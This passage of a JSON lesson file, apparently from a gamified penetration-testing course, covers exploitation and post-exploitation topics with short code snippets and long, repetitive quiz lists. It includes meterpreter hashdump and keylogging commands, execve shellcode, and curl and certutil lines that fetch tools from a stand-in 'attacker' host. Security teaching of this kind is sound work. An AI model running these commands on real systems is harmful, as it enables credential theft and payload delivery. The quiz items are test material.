determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Double encoding bypasses WAFs that...","opts":["Don't exist","Decode only once","Use encryption","Block all traffic"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-msf-advanced","cat":"Exploitation","title":"Metasploit Advanced","diff":2,"xp":150,"intro":"Post-exploitation modules, pivoting, resource scripts.","sections":[{"type":"text","content":"Beyond basic exploit: hashdump, autoroute, keyscan, scripting."},{"type":"code","lang":"bash","content":"meterpreter> hashdump\nmeterpreter> run autoroute -s 10.0.0.0/24\nmeterpreter> keyscan_start"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"autoroute enables...","opts":["File transfer","Routing through compromised host to internal networks","Password cracking","Log deletion"],"ans":1},{"type":"quiz","q":"CVE stands for...","opts":["Common Vulnerabilities and Exposures","Critical Vulnerability Engine","Certified Vulnerability Expert","Centralized Vuln Evaluator"],"ans":0},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-rop-advanced","cat":"Exploitation","title":"Advanced ROP Chains","diff":4,"xp":300,"intro":"Multi-stage ROP for complex scenarios.","sections":[{"type":"text","content":"Leak libc in stage 1, call system('/bin/sh') in stage 2."},{"type":"code","lang":"python","content":"from pwn import *\nrop = ROP(elf)\nrop.puts(elf.got['puts'])  # leak\nrop.call(elf.symbols['main'])  # return for stage 2"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Two-stage ROP is needed when...","opts":["One gadget is enough","You need to leak addresses first","Binary is small","ASLR is disabled"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-custom-shellcode","cat":"Exploitation","title":"Custom Shellcode","diff":4,"xp":300,"intro":"Write position-independent shellcode.","sections":[{"type":"text","content":"Custom shellcode avoids AV signatures by not matching known patterns."},{"type":"code","lang":"nasm","content":"xor rsi, rsi\npush rsi\nmov rdi, 0x68732f6e69622f\npush rdi\nmov rdi, rsp\nmov al, 59\nsyscall"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Custom shellcode avoids AV because...","opts":["Encrypted","Doesn't match known signatures","Valid certs","Runs faster"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-heap-feng","cat":"Exploitation","title":"Heap Feng Shui","diff":5,"xp":300,"intro":"Shape heap layout for reliable exploitation.","sections":[{"type":"text","content":"Allocate/free in specific order to place objects predictably."},{"type":"code","lang":"c","content":"for(int i=0;i<1000;i++) objects[i]=malloc(SIZE);\nfor(int i=500;i<510;i++) free(objects[i]);\ntrigger_uaf();"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Heap feng shui achieves...","opts":["Faster execution","Predictable heap layout for reliable exploitation","Memory compression","Stack protection"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"ex-win-kernel","cat":"Exploitation","title":"Windows Kernel Exploitation","diff":5,"xp":300,"intro":"Pool overflow to SYSTEM token theft.","sections":[{"type":"text","content":"Corrupt pool metadata, build R/W primitives, steal SYSTEM token."},{"type":"code","lang":"c","content":"DeviceIoControl(hDevice, IOCTL_VULN, input, overflow_size, NULL, 0, &bytes, NULL);\n// Spray pool -> corrupt adjacent object -> token theft"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Windows kernel pool spraying uses...","opts":["User malloc","Kernel objects like Events and IoCompletionPorts","Stack allocation","Heap allocation"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"px-shell-stab","cat":"Post-Exploitation","title":"Shell Stabilization","diff":1,"xp":75,"intro":"Turn raw shells into interactive TTYs.","sections":[{"type":"text","content":"Python PTY, stty raw, export TERM for proper terminal."},{"type":"code","lang":"bash","content":"python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Ctrl+Z\nstty raw -echo; fg\nexport TERM=xterm"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Stabilization adds...","opts":["Encryption","Tab completion, history, proper terminal handling","Speed","Stealth"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-file-transfer","cat":"Post-Exploitation","title":"File Transfer Methods","diff":1,"xp":75,"intro":"Get tools on target, data off target.","sections":[{"type":"text","content":"HTTP, SMB, SCP, base64, certutil \u2014 multiple methods."},{"type":"code","lang":"bash","content":"python3 -m http.server 8000  # serve\ncurl http://attacker:8000/tool -o /tmp/tool  # download\ncertutil -urlcache -split -f http://attacker:8000/t.exe C:\\t.exe"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"certutil is useful because...","opts":["It's an exploit","It's a legitimate system binary (LOLBin)","It's a web server","It's a compiler"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, 